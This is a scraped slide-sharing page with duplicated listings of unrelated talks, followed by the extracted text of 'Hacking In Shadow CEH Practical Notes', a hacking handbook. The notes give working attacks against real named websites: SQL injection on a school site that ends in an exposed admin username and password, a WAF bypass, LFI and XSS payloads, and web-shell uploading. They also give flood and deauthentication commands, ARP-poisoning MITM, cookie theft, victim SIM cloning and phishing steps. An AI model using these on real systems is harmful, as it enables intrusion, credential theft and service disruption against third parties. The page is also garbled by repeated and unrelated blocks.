In this lecture you will study about
Google Dorks
Types of Google Dorks
SQL injection
Types of SQL injection
Defending against SQL injection
GOOGLE DORKS
inurl
intitle
allintitle
allinurl
filetype or ext
allintext
intext
SQL INJECTION
What are injection attacks?
How SQL Injection Works
Exploiting SQL Injection Bugs
Mitigating SQL Injection
Defending Injection Attacks
A comprehensive and detailed guide to Seo Footprints. Learn about the proven method to find and use SEO Footprints to help rank better in Search Engine like Google and Bing. If you know how to find Seo footprints, then you have hit the goldmine and building backlinks become so much easier.
In this lecture you will study about
Google Dorks
Types of Google Dorks
SQL injection
Types of SQL injection
Defending against SQL injection
GOOGLE DORKS
inurl
intitle
allintitle
allinurl
filetype or ext
allintext
intext
SQL INJECTION
What are injection attacks?
How SQL Injection Works
Exploiting SQL Injection Bugs
Mitigating SQL Injection
Defending Injection Attacks
A comprehensive and detailed guide to Seo Footprints. Learn about the proven method to find and use SEO Footprints to help rank better in Search Engine like Google and Bing. If you know how to find Seo footprints, then you have hit the goldmine and building backlinks become so much easier.
This document contains various methods to hack or pentest the web-server and web-applications.
1. A person can use it as hand book for hacking websites.
2. All contents of these hand book is searched and taken out from various other websites & blogs...
3. Use these knowledge for education purpose only.
Lecture 15 fraud schemes - james a. hall book chapter 3Habib Ullah Qamar
Fraud Schemes explains How one can conduct frauds, three ways are Statement, Corruption and Asset Misappropriation.How Computer Frauds can be conducted in data collection, processing and information generation.
Cyber crime journal by central detective training schoolBivas Chatterjee
Cyber crime journal by central detective training school by Bivas Chatterjee. Special Public Prosecutor for Cyber Law and Electronics Evidence, Certified Ethical Hacker, Computer Hacking Forensic Investigator, Author of Cyber Crime Manual in English, Bengali and Hindi,
Cyber Evidence Manual, Cyber Security and The Law, Cyber Contract(Legal Analysis), Dense Cloud( Legal Analysis of Cloud), Information Technology Manual, Your Ultimate Protection Guide. Faculty at CDTS under MHA, SVSPA, ATI, CID, Cyber P.S. Kolkata, DCSI etc. Dealing with all major Telecom and infrastructure Companies.
LOPSA SD 2014.03.27 Presentation on Linux Performance Analysis
An introduction using the USE method and showing how several tools fit into those resource evaluations.
Nigerian design and digital marketing agencySamson Aligba
This is a summary of projects completed by Brand Effectiveness in 2013. Covering the areas of brand identity and digital marketing for Nigerian businesses and startups
VideoLan VLC Player App Artifact ReportAziz Sasmaz
VideoLan VLC Player App Artifact Report can be used in forensics investigations.This is the windows store app.
Watched videos and other valuable information can be found in its sqlite database.
Network scanning with Nmap for Noobs and Ninjas - This slide was presented at Null Delhi monthly security meet by Nikhil and Jayvardhan.
https://www.facebook.com/nullOwaspDelhi/
This document contains various methods to hack or pentest the web-server and web-applications.
1. A person can use it as hand book for hacking websites.
2. All contents of these hand book is searched and taken out from various other websites & blogs...
3. Use these knowledge for education purpose only.
Lecture 15 fraud schemes - james a. hall book chapter 3Habib Ullah Qamar
Fraud Schemes explains How one can conduct frauds, three ways are Statement, Corruption and Asset Misappropriation.How Computer Frauds can be conducted in data collection, processing and information generation.
Cyber crime journal by central detective training schoolBivas Chatterjee
Cyber crime journal by central detective training school by Bivas Chatterjee. Special Public Prosecutor for Cyber Law and Electronics Evidence, Certified Ethical Hacker, Computer Hacking Forensic Investigator, Author of Cyber Crime Manual in English, Bengali and Hindi,
Cyber Evidence Manual, Cyber Security and The Law, Cyber Contract(Legal Analysis), Dense Cloud( Legal Analysis of Cloud), Information Technology Manual, Your Ultimate Protection Guide. Faculty at CDTS under MHA, SVSPA, ATI, CID, Cyber P.S. Kolkata, DCSI etc. Dealing with all major Telecom and infrastructure Companies.
LOPSA SD 2014.03.27 Presentation on Linux Performance Analysis
An introduction using the USE method and showing how several tools fit into those resource evaluations.
Nigerian design and digital marketing agencySamson Aligba
This is a summary of projects completed by Brand Effectiveness in 2013. Covering the areas of brand identity and digital marketing for Nigerian businesses and startups
VideoLan VLC Player App Artifact ReportAziz Sasmaz
VideoLan VLC Player App Artifact Report can be used in forensics investigations.This is the windows store app.
Watched videos and other valuable information can be found in its sqlite database.
Network scanning with Nmap for Noobs and Ninjas - This slide was presented at Null Delhi monthly security meet by Nikhil and Jayvardhan.
https://www.facebook.com/nullOwaspDelhi/
[Guest lecturer]
Place: University of Twente
Course: Network Security
Audience: bachelor students of computer science and electrical engineer, master students of computer science and telematics, master students from the 3TU cyber security, and members of ICT labs.
Black Hat Europe 2015 - Time and Position Spoofing with Open Source ProjectsWang Kang
Time and position data of mobile devices are trusted without checking by most vendors and developers. We discover a method of GPS spoofing with low-cost SDR devices. The method can be used to alter the location status as well as the time of affected devices, which poses a security threat to location-based services. We also examine other positioning methods used by smart devices (e.g. WiFi) and how to spoof them. Advices on preventing such spoofing are given.
I'm take picture from here and there by goggling not mentioning all source please let me know if anyone has any objection. This presentation was presented in IUT CTF G3t R00t
This presentation "Threat hunting on the wire" is part of a a series of courses on the subject of Threat Hunting. It covers command-line packet analysis, and network forensics.
Breaking the cyber kill chain! This slide was presented in securITy – information security conference digital world 2017. This talk is about proactive security and threat hunting.
Similar to Hacking in shadows By - Raghav Bisht (20)
1.Wireless Communication System_Wireless communication is a broad term that i...JeyaPerumal1
Wireless communication involves the transmission of information over a distance without the help of wires, cables or any other forms of electrical conductors.
Wireless communication is a broad term that incorporates all procedures and forms of connecting and communicating between two or more devices using a wireless signal through wireless communication technologies and devices.
Features of Wireless Communication
The evolution of wireless technology has brought many advancements with its effective features.
The transmitted distance can be anywhere between a few meters (for example, a television's remote control) and thousands of kilometers (for example, radio communication).
Wireless communication can be used for cellular telephony, wireless access to the internet, wireless home networking, and so on.
Understanding User Behavior with Google Analytics.pdfSEO Article Boost
Unlocking the full potential of Google Analytics is crucial for understanding and optimizing your website’s performance. This guide dives deep into the essential aspects of Google Analytics, from analyzing traffic sources to understanding user demographics and tracking user engagement.
Traffic Sources Analysis:
Discover where your website traffic originates. By examining the Acquisition section, you can identify whether visitors come from organic search, paid campaigns, direct visits, social media, or referral links. This knowledge helps in refining marketing strategies and optimizing resource allocation.
User Demographics Insights:
Gain a comprehensive view of your audience by exploring demographic data in the Audience section. Understand age, gender, and interests to tailor your marketing strategies effectively. Leverage this information to create personalized content and improve user engagement and conversion rates.
Tracking User Engagement:
Learn how to measure user interaction with your site through key metrics like bounce rate, average session duration, and pages per session. Enhance user experience by analyzing engagement metrics and implementing strategies to keep visitors engaged.
Conversion Rate Optimization:
Understand the importance of conversion rates and how to track them using Google Analytics. Set up Goals, analyze conversion funnels, segment your audience, and employ A/B testing to optimize your website for higher conversions. Utilize ecommerce tracking and multi-channel funnels for a detailed view of your sales performance and marketing channel contributions.
Custom Reports and Dashboards:
Create custom reports and dashboards to visualize and interpret data relevant to your business goals. Use advanced filters, segments, and visualization options to gain deeper insights. Incorporate custom dimensions and metrics for tailored data analysis. Integrate external data sources to enrich your analytics and make well-informed decisions.
This guide is designed to help you harness the power of Google Analytics for making data-driven decisions that enhance website performance and achieve your digital marketing objectives. Whether you are looking to improve SEO, refine your social media strategy, or boost conversion rates, understanding and utilizing Google Analytics is essential for your success.
APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024APNIC
Ellisha Heppner, Grant Management Lead, presented an update on APNIC Foundation to the PNG DNS Forum held from 6 to 10 May, 2024 in Port Moresby, Papua New Guinea.
Italy Agriculture Equipment Market Outlook to 2027harveenkaur52
Agriculture and Animal Care
Ken Research has an expertise in Agriculture and Animal Care sector and offer vast collection of information related to all major aspects such as Agriculture equipment, Crop Protection, Seed, Agriculture Chemical, Fertilizers, Protected Cultivators, Palm Oil, Hybrid Seed, Animal Feed additives and many more.
Our continuous study and findings in agriculture sector provide better insights to companies dealing with related product and services, government and agriculture associations, researchers and students to well understand the present and expected scenario.
Our Animal care category provides solutions on Animal Healthcare and related products and services, including, animal feed additives, vaccination
Bridging the Digital Gap Brad Spiegel Macon, GA Initiative.pptxBrad Spiegel Macon GA
Brad Spiegel Macon GA’s journey exemplifies the profound impact that one individual can have on their community. Through his unwavering dedication to digital inclusion, he’s not only bridging the gap in Macon but also setting an example for others to follow.
2.Cellular Networks_The final stage of connectivity is achieved by segmenting...JeyaPerumal1
A cellular network, frequently referred to as a mobile network, is a type of communication system that enables wireless communication between mobile devices. The final stage of connectivity is achieved by segmenting the comprehensive service area into several compact zones, each called a cell.
1. 1 | P a g e
R o o t - X S e c u r i t y
H a x a - 1 N u l l L a m b d a : X
0 1 1 0 1 0 0 1 0 0 1
0 0 0 1 1 1 0 0 0 1 1
1 2 / 3 1 / 2 0 1 4
Root-X , Shadow Walker &
Raghav
Hacking In Shadow
CEH Practical Notes
2. December 31,
2014
[HACKING IN SHADOW CEH PRACTICAL
NOTES]
CONTENT
Foot-printing
Scanning/Banner Grabbing
Enumeration
Google Hacking
Information Gathering [Automated Process ]
Dos Attack D-Dos Attacks
IDS - IPS - Firewall - Antivirus - Honey-pots
Mobile Hacking
Sniffing
Social Engineering
Web-servers & Web-application Hacking
System Hacking
Malwares
Penetration testing
Buffer Overflow
Wi-Fi Hacking
4. December 31,
2014
[HACKING IN SHADOW CEH PRACTICAL
NOTES]
6. Email Harvesting
Tools
samspade
black widow
GSA Email Spider
Email Extractor
Metasploit [ Backtrack , Kali Linux ]
msfconsole
search gather [ Search The all Information Gathering Exploits ]
use auxiliary/gather/search_email_collector
set DOMAIN <domain name>
exploit
5. December 31,
2014
[HACKING IN SHADOW CEH PRACTICAL
NOTES]
Scanning & Banner Grabbing
1. Network Scanning
IP scanning
port scanning
Eg. first IP scanning so for IP scanning we use:
Check it out :http://120.59.128.29
I. Angry IP Scanner :
0.0.0.0-255.255.255.255 using the concept of = ping sweep , so lets start
Our Target : 120.59.128.1 - 120.59.128.255
On Ports : 80,21,443,110
lets try to open this ip on port 80 - > Its shows me ADSL Modem -> To bypass this
modem we try brute force or dictionary attack.
Eg. Top ten passwords :
admin
user
custom
manager
abc123
abc@123
password
pa55w0rd
Pa55w0Rd
admin@123
123456
passwd
admin123
user123
user@123....etc
II. Nmap/Zenmap
III. Port Scanner
IV. Network scan ( NET DISCOVER [ BT-tool ] ) :
netdiscover -i <interface> -r <target>/24 /16 <--- subnet
netdiscover -i etth0 -r 192.168.1.0/24
20. December 31,
2014
[HACKING IN SHADOW CEH PRACTICAL
NOTES]
1. DOS ATTACK
It is an attempt to make a machine or network resource unavailable to its intended
users.
Consuming all resources given to person. Like Network bandwidth , All Type Of
Memory etc...
Ping Of Death
ping -t -l 6550 google.com [ max buffer size = 65500 ]
ping bytecode.in -l 1460 -n 10000000 -w 1
Effective system [ Solaris 2.4 , ninix , win3.11,95 ]
SYN-ATTACK
hping3 -S 192.168.1.38 -a 192.168.1.254 -p 22 --flood [-S -> SYN, open ssh
port, syn flood on router, -a <Source address>, -S<Victim addtress>]
UDP/HTTP/TCP Flooding
LOIC
HOIC
Smurf Attack
make your own packet and flood on network
pktbuilder
packETH 1.6 [ linux & windows ]
CDP Flooding [ Cisco Discovery Protocol ]
yersinia [ backtrack ]
Done on Cisco Switches & Routers
MAC Flooding [ BT ]
Flooding network switches
ARP Spoofing
Net cut [ Windows ]
ettercap [ Backtrack ]
Deauthentication Technique
aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30
ath0
Where:
21. December 31,
2014
[HACKING IN SHADOW CEH PRACTICAL
NOTES]
-0 : means Deauthentication
1 : is the number of deauths to send (you can send multiple if
you wish); 0 means send them continuously
-a : MAC address of the access point ( Router )
-c : MAC address of the client to Deauthentication; if this is
omitted then all clients are deauthenticated
ath0 : is the interface name
2. D-Dos ATTACK
HTTP ATTACK
Get-Post Methods
DNS Amplification Attack
NTP Amplification Attack
Slowloris Attack [ Used when , Firewall blocks your Ip address after some
requests ] [slowloris.pl ]
slowloris.pl -dns www.site.com -timeout 1 -cache
3. IPV6 Flooding : [ RA Flood Attack]
Victim : windows user
Advertising the IPV6 Network [ ./fake_router6 eth1 def:c0::/64 ]
cd /pentest/spoofing/thc-ipv6
Now flooding. [ ./flood_router6 eth1 ]
4. Scapy [ Packet manipulation tool ] Features -> capture, create, play,
reply, scan, discover.]
I. scapy -> Sending packet from scapy
send(IP(src="192.168.1.55",dst="192.168.1.1")/ICMP()/"OurPayload") -> check with
wireshark.
ctrd+d
II. scapy -> Creating Our Packet & Sending Packet
L2=Ether()
22. December 31,
2014
[HACKING IN SHADOW CEH PRACTICAL
NOTES]
L3=IP()
L4=TCP()
L2.show()
L2=Ether(src="01:23:45:67:89:ab")
L3=IP(ttl=99, dst="192.168.1.1")
del(L3.dst)
L3.dst="192.168.1.2"
L4=TCP(sport=6783, dport=22, flag="A")
L4.show()
send=sendp(L2/L3/L4) -> To send Packet
III. scapy -> Sniffing with scapy
sniff(iface="eth0", prn=lambda x:x.show()) -> show full packet detail
ctrl+c
sniff(iface="eth0", prn=lambda x:x.summary()) -> do not show full packet detail
sniff(filter="host 192.168.1.1", count=5)
a=_
a.nsummary()
a[1]
5. Hping3 [ port scanning, syn, ack, ip, others host discovery, sniffer,
flooding, file transfer ]
hping3-h "or" man hping3 [Help menu]
hping3 -S www.lpu.in -p 80 -c 2 [ -S -> SYN Request, -c -> how many time to ping ]
hping3 -S 192.168.1.38 -p ++50 -c 5 [++50 port start with 50,51,52,53]
hping3 -1 192.168.1.x --rand-dest -I eth0 [-1-> ICMP , Ping all possible ip address in
random order ]
hping3 -1 192.168.1.1 --icmp-ts -c 2 [Check time stamp ]
hping3 -8 50-56 -S 8.8.8.8 [-8 -> Scaning, 50-56 -> Port, 8.8.8.8 -> google dns server]
hping -2 192.168.1.6 -p 80 -c 1 [-2 -> udp]
hping3 -F -P -U 192.168.1.38 -c 3 [-F -> FIN, -P -> PUSH, -U -> URGENT] [X-Mas
Scan]
hping3 192.168.1.38 -Q -P 139 - s [-Q -> Sequence number]
hping3 -S 192.168.1.38 -a 192.168.1.254 -p 22 --flood [-S -> SYN, open ssh port, syn
flood on router, -a <Source address>, -S<Victim addtress>]
hping3 –rand-source targetIPadress –flood -S -L 0 -p 80
hping3 -2 www.lpu.in -p ++44444 -T -n [Trace Route using UDP] [ctrl+z -> If doesn't
respond ]
hping3 -S www.lpu.in -p 53 -T [Trace Route using TCP]
23. December 31,
2014
[HACKING IN SHADOW CEH PRACTICAL
NOTES]
NOTE : hping3 also work as hping interpreter & scapy.
hping3
hping send
"ip(saddr=192.168.1.55,daddr=192.168.1.38,ttl=15)+tcp(sport=6783,dport=80,flags=s)"
6. CDP - Flooding [ Cisco Discovery Protocol ] [CPU Damaging
Routers & Switches]
yersinia -G
Launch attack
CDP
flood CDP table
ok
List attacks
cancel all attacks
7. HTTP Flood Attack
ApacheBench [Tool BT]
ab -c 1000 -n 10000 http://youripaddress/
8. UDP Flood Attack
hping3 -flood-rand-source -udp -p 53 YourtargetIPaddress
*9. SYN FloodAttack
hping3 -rand-source targetIPadress -flood -S -L 0 -p 80
25. December 31,
2014
[HACKING IN SHADOW CEH PRACTICAL
NOTES]
IDS - IPS - Firewall - Antivirus - Honeypots
1. Firewall
I. Windows Firewall [ netsh ]
netsh /?
netsh lan /?
help
firewall
help
netsh firewall set portopening tcp 445 smb enable --> To open port in my system
TCP/IP troubleshooting and interface resets :
Install the TCP/IP protocol- netsh int ipv4 install
Uninstall the TCP/IP protocol- netsh int ipv4 uninstall
Configure the Windows Advanced Firewall :
Show all firewall rules
netsh advfirewall firewall show rule name=all
Delete an inbound advanced firewall rule for port 21
netsh advfirewall firewall delete name rule name=all protocol=tcp
localport=21
Export Windows Advanced Firewall settings -
netsh advfirewall export “c:advfirewall.wfw”
Perhaps the most common command you might use is the command to enable or
disable your Windows firewall, like this:
netsh firewall set opmode disable
netsh firewall set opmode enable
1. To deny all incoming connections and allow all outgoing connections :
netsh advfirewall set all profiles firewall policy block inbound, allow
outbound
2. To enable firewall:
netsh advfirewall set all profiles state on
netsh firewall set opmode enable
26. December 31,
2014
[HACKING IN SHADOW CEH PRACTICAL
NOTES]
3. To disable firewall:
netsh advfirewall set all profiles state off
netsh firewall set opmode disable
4. Allow or Deny rules
To add a rule allowing tcp or udp incoming packets on port 80:
netsh advfirewall firewall add rule name="HTTP"
protocol=TCP localport=80 action=allow dir=IN
netsh advfirewall firewall add rule name="HTTP"
protocol=UDP localport=80 action=allow dir=IN
To deny tcp or udp packets on port x:
netsh advfirewall firewall add rule name="HTTP"
protocol=TCP localport=80 action=block dir=IN
netsh advfirewall firewall add rule name="HTTP"
protocol=UDP localport=80 action=block dir=IN
5. Delete a rule
To delete a rule issue the following command:
netsh advfirewall firewall delete rule name="HTTP"
6. Allow or deny
incoming connection for specific port and IP
To allow from specific ip:
netsh advfirewall firewall add rule name="HTTP"
protocol=TCP localport=80 action=allow dir=IN remoteip=x.x.x.x
To deny from specific ip:
netsh advfirewall firewall add rule name="HTTP"
protocol=TCP localport=80 action=block dir=IN remoteip=x.x.x.x
Allow or deny a subnet
netsh advfirewall firewall add rule name="HTTP"
protocol=TCP localport=80 action=block dir=IN remoteip=x.x.x.x/24
27. December 31,
2014
[HACKING IN SHADOW CEH PRACTICAL
NOTES]
or
netsh advfirewall firewall add rule name="HTTP"
protocol=TCP localport=80 action=allow dir=IN remoteip=x.x.x.x-x.x.x.x
or
netsh advfirewall firewall add rule name="HTTP"
protocol=TCP localport=80 action=block dir=IN remoteip=localsubnet
2. Linux Firewall [ Iptables ]
IP Address Blocking
iptables -A INPUT -s <Ip Address> -j DROP
iptables -A INPUT -s <Ip Address> -p tcp --destination-port 80 -j DROP
iptables -A INPUT -s <Ip Address> -p tcp --destination-port 443 -j DROP
sudo ufw deny from $ip
IP Address Allowing
iptables -D INPUT -s <Ip Address> -j DROP
sudo ufw allow from <Ip Address>
2. Honeypot
Net Tools
Hack Trapper
30. December 31,
2014
[HACKING IN SHADOW CEH PRACTICAL
NOTES]
Mobile Hacking
1. SIM Cloning
SIM - Subscriber identity module
IMSI - International mobile subscriber identity
IMEI - International Mobile Station Equipment Identity
Esn - Electronic serial number
MIN - Mobile identification number
CDMA Sim Cloning :
1. check for usb drivers
2. attach usb
3. check for port "right click on my computer > manage > device manager > ports"
4. open cdma workshop 2.7.0 set the port > press read.[ All detail of phone will be saved
]
5. give back the victim phone to him.
7. attach reliance netconnect (http://kollam.olx.in/reliance-netconnect-zte-880-cdma-1x-
iid-449181852)
> http://www.priceindia.org/broadband/reliance/zte-mg-880-data-card-price/
8. again see port.
9. open CDMA workshop v2.7.0 --> set port
10. write all sim details on zte-mg-880-data-card
32. December 31,
2014
[HACKING IN SHADOW CEH PRACTICAL
NOTES]
Useful Apps :
FX File Explorer Plus v2.3.1.7 ROOT + All Add-Ons
Root Explorer v3.1.7 for Android 2.3 & 3.0+
SD Maid Pro v3.0.2.8 ROOT + Unlocker
SuperSU v1.93 + SuperSU Pro Key
Lucky Patcher v4.3.1.apk
SRSRoot v4.7 Android SRS RootSuperSU v1.93
Root.Explorer.v2.7
SuperSU Pro Key v1.00 ROOT FULL Android
How to root your...
HTC One (M8)
Unlock your bootloader via HTCdev.com
Download and install TWRP for the M8 from
http://teamw.in/project/twrp2/225
Flash the SuperSU root zip from http://forum.xda-
developers.com/showthread.php?t=1538053
Samsung Galaxy S5
Download the Odin fl ash utility from http://forum.xda-
developers.com/showthread.php?t=2189539
Download the CF-Auto-Root package from http://forum.xda-
developers.com/showthread.php?t=2696537
Extract the TAR fi le from the CF-Auto-Root zip Select the TAR fi le as
type PDA in Odin, and fl ash with your device in download mode (power
on with home and volume down held)
Sony Xperia Z2
Unlock the bootloader of your device: http://forum.xda-developers.com/
showthread.php?t=2440597
Download ClockworkMod Recovery from http://forum.xda-developers.
com/showthreadphp?t=2702001 and flash using fastboot
Reboot to recovery and fl ash the SuperSU root zip from
http://forum.xda-developers.com/showthreadphp?t=1538053
33. December 31,
2014
[HACKING IN SHADOW CEH PRACTICAL
NOTES]
3. Jail breaking IOS APPLE
Jailbreak 7, 7.0.3, 7.0.4 untethered for iPhone 5s, 5c, 5, iPad and iPod touch
(Guide)
STEP 1: Download Evasi0n7 for Mac OS X/Windows. *new version here*
STEP 2: Download your iOS 7.x.x from our download page.
STEP 3: Make sure to backup all your data on your iPhone using iTunes or iCloud before using
Evasi0n7 untethered jailbreak.
STEP 4: Launch Evasi0n7 and plug in your device to the computer then click on "Jailbreak"
button.
STEP 5: Now Evasi0n7 will start the jailbreak process, so sit back and enjoy.
STEP 6: Evasi0n7 will reboot your device.
STEP 7: After done, an app of Evasi0n7 will appear on your iPhone's homescreen. Tap on it.
STEP 8: Your device will be rebooted again.
STEP 9: Evasi0n7 will continue processing your jailbreak and will reboot your iPhone for
several times until the jailbreak is done.
STEP 8: And you are ready to go.
SOURCE : http://www.redsn0w.us/2013/12/jailbreak-7-703-704-untethered-for.html
Supported Devices :
For both Mac OS X and Windows, you can now jailbreak your iOS 7.x device with one-click
Evasi0n7 jailbreak tool.
Jailbreak devices:
iPhone 5s
iPhone 5c
iPhone 5
iPhone 4S
iPhone 4
iPad 2
iPad 3
iPad 4
iPad Air
iPad mini
iPad mini 2
iPod touch 5
34. December 31,
2014
[HACKING IN SHADOW CEH PRACTICAL
NOTES]
4. Smartphone Pentest Framework Master
Link : https://github.com/georgiaw/Smartphone-Pentest-Framework
35. December 31,
2014
[HACKING IN SHADOW CEH PRACTICAL
NOTES]
Sniffing
1. Man In The Middle Attack Using Ettercap.
Tools :
1] whireshark
2] ettercap
3] cain & able
1] Ettercap:
> vi /etc/etter.conf
> Put : eu_uid = 0
> Put : eu_gid = 0
> Come to linux and enable the iptables rule . ( Remove # )
> ettercap -G [ To open ettercap in graphical mode ]
> sniff / unified sniff / choose interface
> Hosts / scann for host / Host list
> add router ip to target 1 & rest r victims to target 2
> MITM / arp pois
> Start Sniff
2] Wireshark:
> open wireshark
> start sniff
> Filters protocols [ http,ftp,smtp etc ] => http://wiki.wireshark.org/DisplayFilters
> http.request.method == "POST"
> tcp.port eq 25 or icmp
> ip.src==192.168.0.0/16 and ip.dst==192.168.0.0/16
> tcp.window_size == 0 && tcp.flags.reset != 1
> smb || nbns || dcerpc || nbss || dns
> ip.addr == 10.43.54.65
> ip.addr != 10.43.54.65
NOTE : Analyzing Traffic Using Wireshark
36. December 31,
2014
[HACKING IN SHADOW CEH PRACTICAL
NOTES]
Step1 : Open Wireshark
Step2 : Choose Interface and Start Sniffing
39. December 31,
2014
[HACKING IN SHADOW CEH PRACTICAL
NOTES]
3. Man In The Middle Attack Using xplico :
Tools Need
1. Ettercap
2. Xplico
Victim Info :
Victim -> 192.168.1.21
arp -a -> aa-aa-aa-aa-aa-aa
gateway > 192.168.1.1
apt-get update
apt-get upgrade
1. ettercap -G
> sniff
> unified sniffing
> select interface
> host
> scan for host
> Host list
> default gateway add to target 1
> .21 <victim> add to target 2
> Mitm
> arp poisoning
> ok
2. In terminal -> IP Forwarding # echo 1 > /proc/sys/net/ipv4/ip_forward
3. Backtrack > Forensics > Network Forensics > xplico web gui
> http://localhost:9876/
> u : xplico P: xplico
> case
> Live acquistion
> case name : Anything > Create
> Click on your case Eg. anything
> New Session
> Session Name : xyz
> click on session xyz
> At Live :
> Interface
40. December 31,
2014
[HACKING IN SHADOW CEH PRACTICAL
NOTES]
> lo, et0, wlan0 ...Etc
NOTE : If victim is doing net all its session will be saved by xplico.
4. driftnet –I eth0
5. Session Hijacking
Tokens = 128-256 bit AES cipher
1. Cookies
> wireshark filter : http.cookie contains "datr"
> http.cookie && ip.src==<Target ip> -----> Check For : 1012 GET / HTTP/1.1
2. <SCRIPT>alert(document.cookie);</SCRIPT> [XSS - Vulnerability]
3. Fiddler
Step 1 : Open Fiddler
41. December 31,
2014
[HACKING IN SHADOW CEH PRACTICAL
NOTES]
Step 2 : Tick the https Decryption Check Box
Step 3 : Take Your Victim Traffic
42. December 31,
2014
[HACKING IN SHADOW CEH PRACTICAL
NOTES]
Step 4 : Take Out Your Victim Cookies
Step 5 : Attacker replace them with help Cookies Editor on firefox.
43. December 31,
2014
[HACKING IN SHADOW CEH PRACTICAL
NOTES]
Social Engineering
1. Human Based
2. Computer Based
1. Human Based :
> There is no patch to human stupidity.
> Social Eng is the human side of breaking into a corporate network.
1. Posing as legitimate end user.
> Give identity and asks for the sensitive information.
2. Posing as Important user.
> as VIP, CFO, CEO etc
3. Posing as Technical Support.
> calls as technical support staff and request id & password
4. Eavesdropping
> or unauthorized listening of conversation or reading of
messages.
5. Sholder Surfing
> Looking over your sholder as you enter a password
6. Dumpster Diving
> Search for sensitive information at target company's.
> Trash-bins
> printer trash bins
> sticky notes
> phone bills
> contact information
> financial information
7. Tailgating
> An unauthorized person, wearing a fake ID badge enter
secured area by closely following an authorized person through a door
requiring key access.
8. Piggybacking
> I forgot my ID badge at home. Please help me.
44. December 31,
2014
[HACKING IN SHADOW CEH PRACTICAL
NOTES]
2. Computer Based Social Engineering :
> Mail / attachments
> Trojens
> Keyloggers
> Pop-up Windows
> Phishing
> Hoaxes and chain letters
> Websites / Sweepstakes
> Spam mails
Eg. Phishing
Step1 : Creating Fake Facebook page.
Step2 : Save This page Source Code In Notepad
52. December 31,
2014
[HACKING IN SHADOW CEH PRACTICAL
NOTES]
Web-servers & Web-application
Hacking
1] SQL Injection
2] Exploiting Hidden Elements [Tool : web developer addon]
> To manuplating html elements, tags,Forms etc on website.
> Eg: woodlandworldwide.com [vanulable site]
3] PHP Discloser
> look for vanurable site like
[http://hrithikrules.com/displayArt.php?fname=filmography/krrish2/permission.txt&dirname=ma
in]
> now [ http://hrithikrules.com/displayArt.php?fname=index.php]
4] XSS [Cross Site Scripting] [put JS query to search box, URLS etc]
> http://www.hrithikrules.com/ [Put the JS to his search box it will redirectu]
> <script>alert("hacked")</script>
--------> Beef [Tool] [Backtrack] [start server and attach your link to your xss iframe scrpt and
sentd it to other user in lan]
--------> Download beef -> upload it to free hosting site -> get your link ->attach to xxs ---> send
any where in world.
> <script iframe src=http://www.world4free.in></script>
4.1] XSS Shell
5] Lfi / Rfi [File inclusion] [Tool : wAppex]
>http://www.hrithikrules.com/displayArt.php?fname=filmography/mohenjodaro/research
.txt&dirname=main
>http://www.hrithikrules.com/displayArt.php?fname=../../../../../../../../../../../../../../etc/pass
wd
6] DNN Portal Hacking
7] Shell Uploading
> Do sql injection first find admin password for server.
53. December 31,
2014
[HACKING IN SHADOW CEH PRACTICAL
NOTES]
> now open his website find any page whick upload some things [ multimedia uploading
]
> upload your shell [ .php,.aspx,.asp,.jsp ]
NOTE : some time directly shell are not uploade so rename there extention to any other filetype
and run " Tamper Data Firefox addon "
while uploading shell. remove your extantion while uploading.
> eg : http://www.arenamultimedia.in/news.aspx?id=news
===========================================================
1. Sql Injection :
www.mags.edu.in/aboutus.php?id=2
www.mags.edu.in/aboutus.php?id=2' |<--Error
www.mags.edu.in/aboutus.php?id=2 order by 1 |<--No Error
www.mags.edu.in/aboutus.php?id=2 order by 100 |<--Error
www.mags.edu.in/aboutus.php?id=2 order by 10 |<--Error
www.mags.edu.in/aboutus.php?id=2 order by 2 |<--Error + page content
SO, Directly find the vulnerable column...
www.mags.edu.in/aboutus.php?id=2 union select 1 |<--Show Nothing
www.mags.edu.in/aboutus.php?id=-2 union select 1 |<--Vulnerable column is = 1
www.mags.edu.in/aboutus.php?id=-2 union select 1,2 |<--Error
Now,
1. Find Version Of Database.
> www.mags.edu.in/aboutus.php?id=-2 union select @@version | 5.0.96-log
2. Find Database Name
> www.mags.edu.in/aboutus.php?id=-2 union select database() | magschool
3. To Find Numbers Of Tables In Database
www.mags.edu.in/aboutus.php?id=-2 union select group_concat(table_name) from
information_schema.tables where table_schema=database()
amaps_admin, -----> 0x616d6170735f61646d696e
campusphotos, categories, celebration, contentmanagement, courses, domains, engineering,
events
54. December 31,
2014
[HACKING IN SHADOW CEH PRACTICAL
NOTES]
,facilities,faculty,medmain,news,pending,query_log,register_form,site_category,sit
es,temp
4. To Find Number of Columns In Table
www.mags.edu.in/aboutus.php?id=-2 union select group_concat(column_name) from
information_schema.columns where table_name=0x616d6170735f61646d696e
adminid ,username ,password
5. To Find Username & Password :
www.mags.edu.in/aboutus.php?id=-2 union select
group_concat(adminid,0x3a,username,0x3a,password) from amaps_admin
adminid = 1
username = adminmags
password = magsmet#749$
______________________________________________________________________________
2. SQL Injection WAF Bypass
http://www.geca.ac.in/departments/hod.php?id=14
http://www.geca.ac.in/departments/hod.php?id=14'
http://www.geca.ac.in/departments/hod.php?id=14 order by 1
http://www.geca.ac.in/departments/hod.php?id=14 order by 2
http://www.geca.ac.in/departments/hod.php?id=14 order by 3
http://www.geca.ac.in/departments/hod.php?id=14 order by 4
http://www.geca.ac.in/departments/hod.php?id=14 order by 5
http://www.geca.ac.in/departments/hod.php?id=14 order by 6
http://www.geca.ac.in/departments/hod.php?id=14 order by 7
http://www.geca.ac.in/departments/hod.php?id=14 order by 8
http://www.geca.ac.in/departments/hod.php?id=14 order by 9
-----------------------------------------------------------
www.geca.ac.in/departments/hod.php?id=14 union select 1,2,3,4,5,6,7,8,9
55. December 31,
2014
[HACKING IN SHADOW CEH PRACTICAL
NOTES]
Not Acceptable! | An appropriate representation of the requested resource could not be found on
this server. This error was generated by Mod_Security.
So,
www.geca.ac.in/departments/hod.php?id=14 /**//*!12345union select*//**/1,2,3,4,5,6,7,8,9
www.geca.ac.in/departments/hod.php?id=-14 /**//*!12345union select*//**/1,2,3,4,5,6,7,8,9
Vulnerable Columns = 6,3,5
=====================================================================
www.geca.ac.in/departments/hod.php?id=-14 /**//*!12345union
select*//**/1,2,3,4,@@version,6,7,8,9
Version = 5.1.57-rel12.8-log
=====================================================================
Finding Tables :
http://www.geca.ac.in/departments/hod.php?id=-
14+/**//*!12345union+select*//**/1,2,3,4,table_name,6,7,8,9+from+/*!information_schema.tabl
es*/+where+/*!table_schema*/+like+database()
about_aurangabad
